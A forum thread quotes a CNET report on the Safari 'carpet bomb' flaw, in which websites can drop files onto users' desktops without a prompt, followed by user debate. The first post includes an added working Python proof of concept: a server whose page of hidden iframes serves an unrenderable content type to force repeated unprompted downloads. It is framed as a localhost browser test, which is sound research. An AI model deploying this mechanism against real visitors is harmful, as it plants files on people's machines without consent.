Overclock.net › Forums › Industry News › Software News › [CNET]Apple dismisses Safari vulnerability

[CNET]Apple dismisses Safari vulnerability

post #1 of 12
Thread Starter 
Safari users are at risk of littering their desktops with malicious software because the browser does not ask for user permission when downloading files in the way that Firefox and Internet Explorer do, a security researcher said Thursday.

In a blog post titled "Safari Carpet Bomb," Nitesh Dhanjani describes how a rogue Web site can easily download resources to the Windows desktop or downloads directory on the Mac.

An Apple representative told Dhanjani that an "enhancement request" for an "Ask me before downloading anything" preference would be filed with the Safari team. "Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads," the Apple representative wrote in an e-mail to Dhanjani.

Apple does plan to fix a high-risk security vulnerability that Dhanjani discovered. It could be used to remotely steal local files from a user's file system.

An Apple spokesman did not return a phone call and e-mail seeking comment.



"Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served. If you are using Safari in Windows, this is what will happen to your desktop once you visit http://malicious.example.com/," Dhanjani writes in explaining this screenshot.
(Credit: Nitesh Dhanjani)

Source: CNET
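Added example, not code from the CNET article or from Dhanjani's proof of concept: a minimal Python server that reproduces the mechanism described above. It serves a landing page that embeds the same unrenderable resource many times and delivers that resource with the unrecognised Content-Type "blah/blah" from the screenshot caption, with no Content-Disposition, so the file name falls back to the last path segment (carpet_bomb.cgi). The hidden iframes as the way to trigger repeated fetches, the listen address and port, the embed count and the payload bytes are assumptions for this example. A browser that saves responses it cannot render without asking ends up with one file per embed in its download location; a browser that prompts first surfaces each request to the user instead.

```python
"""Minimal reproduction of the 'carpet bomb' download mechanism.

Serves a landing page full of hidden iframes, each pointing at a resource
delivered with a Content-Type the browser cannot render. A browser that
auto-saves unknown types without prompting writes one copy per iframe into
its download directory. The iframe technique, the address/port, the embed
count and the payload bytes are assumptions for this example; nothing here is
taken from the original proof of concept.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer

PAYLOAD_PATH = "/carpet_bomb.cgi"   # file name shown in the article's screenshot
UNKNOWN_TYPE = "blah/blah"          # media type from the caption; no browser renders it
PAYLOAD_BODY = b"harmless text; only the download behaviour matters\n"  # constructed


def landing_page(count: int, path: str = PAYLOAD_PATH) -> str:
    """HTML page that embeds `count` hidden iframes of the payload URL.

    Each iframe is a separate navigation, so each one triggers a separate
    fetch, and therefore a separate download, in a browser that saves
    unrenderable responses automatically.
    """
    frames = "\n".join(
        f'<iframe src="{path}" width="0" height="0" style="display:none"></iframe>'
        for _ in range(count)
    )
    return f"<!doctype html>\n<html><body>\n{frames}\n</body></html>\n"


def payload_headers(content_type: str = UNKNOWN_TYPE,
                    length: int = len(PAYLOAD_BODY)) -> list[tuple[str, str]]:
    """Response headers for the payload.

    An unknown Content-Type and no Content-Disposition: the browser cannot
    render the body and falls back to the URL's last path segment for the
    file name. Cache-Control: no-store makes every iframe fetch hit the
    server again instead of being served from cache.
    """
    return [
        ("Content-Type", content_type),
        ("Content-Length", str(length)),
        ("Cache-Control", "no-store"),
    ]


class CarpetBombHandler(BaseHTTPRequestHandler):
    """Two routes: the payload path and, for everything else, the landing page."""

    def do_GET(self) -> None:
        if self.path == PAYLOAD_PATH:
            self.send_response(200)
            for name, value in payload_headers():
                self.send_header(name, value)
            self.end_headers()
            self.wfile.write(PAYLOAD_BODY)
            return
        body = landing_page(count=50).encode()   # 50 embeds: assumed count
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Assumed listen address; point a browser at http://127.0.0.1:8000/ to test
    # whether it prompts before saving the unrenderable responses.
    HTTPServer(("127.0.0.1", 8000), CarpetBombHandler).serve_forever()
```

Run it and load the landing page in the browser under test: the number of files that appear in the download location without any prompt is the measure of the behaviour the researcher reported.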
post #2 of 12
Noobs! They have a chance of getting another decent browser up there, and look what they do.
post #3 of 12
Why all the articles on these two minor, contrived, proof-of-concept bugs? The carpet bomb would be irritating if anybody ever used it, but nobody would gain anything from it.
post #4 of 12
Quote:
Originally Posted by rabidgnome229
Why all the articles on these two minor, contrived, proof-of-concept bugs? The carpet bomb would be irritating if anybody ever used it, but nobody would gain anything from it.
How is it minor if it gives the possibility to automatically download files without the user's consent? That's a huge security risk in my opinion.
post #5 of 12
Quote:
Originally Posted by Dennisjr13
How is it minor if it gives the possibility to automatically download files without the user's consent? That's a huge security risk in my opinion.
Not unless you can execute it. Otherwise it's just an annoyance with no point.
post #6 of 12
Woo. I needed this for my assignment at school. +Rep Miki
post #7 of 12
Quote:
Originally Posted by rabidgnome229
Not unless you can execute it. Otherwise it's just an annoyance with no point.
But most people will go:
"What's this?"
*double click*

We would just delete it, but so many people would open it to see what it is, and bam, there goes their computer lol
    
CPUMotherboardGraphicsRAM
Intel 2500k Gigabyte Z68X-UD3H-B3 XFX HD5870 16GB G.Skill RipjawsX 
Hard DriveOptical DriveCoolingOS
60GB OCZ Vertex 3 + 2x TB Seagate LG DVD+RW Stock Intel Windows 7 64bit / OSX Mountain Lion 
MonitorKeyboardPowerCase
Dell ST2210 + 17" IBM Das Ultimate S Antec TruePower 650W Antec P183 
MouseMouse PadAudioAudio
Logitech MX Revolution X-Trac Ripper Objective 2 + ODAC Combo Sennheiser HD650 + Klipsch 2.1 Promedia 
  hide details  
Reply
    
CPUMotherboardGraphicsRAM
Intel 2500k Gigabyte Z68X-UD3H-B3 XFX HD5870 16GB G.Skill RipjawsX 
Hard DriveOptical DriveCoolingOS
60GB OCZ Vertex 3 + 2x TB Seagate LG DVD+RW Stock Intel Windows 7 64bit / OSX Mountain Lion 
MonitorKeyboardPowerCase
Dell ST2210 + 17" IBM Das Ultimate S Antec TruePower 650W Antec P183 
MouseMouse PadAudioAudio
Logitech MX Revolution X-Trac Ripper Objective 2 + ODAC Combo Sennheiser HD650 + Klipsch 2.1 Promedia 
  hide details  
Reply
post #8 of 12
Quote:
Originally Posted by Higgins
But most people will go:
"What's this?"
*double click*

We would just delete it, but so many people would open it to see what it is, and bam, there goes their computer lol
Curiosity killed the cat.
post #9 of 12
Quote:
Originally Posted by Higgins
But most people will go:
"What's this?"
*double click*

We would just delete it, but so many people would open it to see what it is, and bam, there goes their computer lol
OSX warns you when you attempt to open executables downloaded from the internet. If they choose to open it when prompted, then they would have chosen to download it when prompted anyway.
post #10 of 12
Quote:
Originally Posted by rabidgnome229
OSX warns you when you attempt to open executables downloaded from the internet. If they choose to open it when prompted, then they would have chosen to download it when prompted anyway.
So does every other operating system in existence (well, except Linux, which requires you to open the console, become su and chmod it into being executable). If Vista's UAC has taught us anything, it's that after clicking "Allow" for the 1000th time it becomes automatic. I could almost guarantee that if Microsoft implemented a patch that changed every 15th UAC message to "Windows needs your permission to have sex with your wife", 90% of the population wouldn't notice it until it came up on Digg.



Oh and typical Apple, "This is not a problem, you will not mention this anymore, whenever you hear a car honk you will buy a song off of iTunes"
    
CPUMotherboardGraphicsRAM
Core i5 4670k ASUS Maximus VI Gene Gigabyte GTX 460 1GB Kingston Hyper-X 
Hard DriveHard DriveHard DriveHard Drive
Samsung 830 OCZ Vertex 3 WD6401AALS WD5000AAKS 
CoolingOSMonitorMonitor
Noctua NH-D14 elementary OS Dell Ultrasharp U2312HM LG W2442PA-BF 
KeyboardPowerCaseMouse
Microsoft Sidewinder X4 Corsair HX750W Corsair Graphite 600T Logitech G700 
Audio
ASUS Xonar DG 
  hide details  
Reply
    
CPUMotherboardGraphicsRAM
Core i5 4670k ASUS Maximus VI Gene Gigabyte GTX 460 1GB Kingston Hyper-X 
Hard DriveHard DriveHard DriveHard Drive
Samsung 830 OCZ Vertex 3 WD6401AALS WD5000AAKS 
CoolingOSMonitorMonitor
Noctua NH-D14 elementary OS Dell Ultrasharp U2312HM LG W2442PA-BF 
KeyboardPowerCaseMouse
Microsoft Sidewinder X4 Corsair HX750W Corsair Graphite 600T Logitech G700 
Audio
ASUS Xonar DG 
  hide details  
Reply
New Posts  All Forums:Forum Nav:
  Return Home
  Back to Forum: Software News
Overclock.net › Forums › Industry News › Software News › [CNET]Apple dismisses Safari vulnerability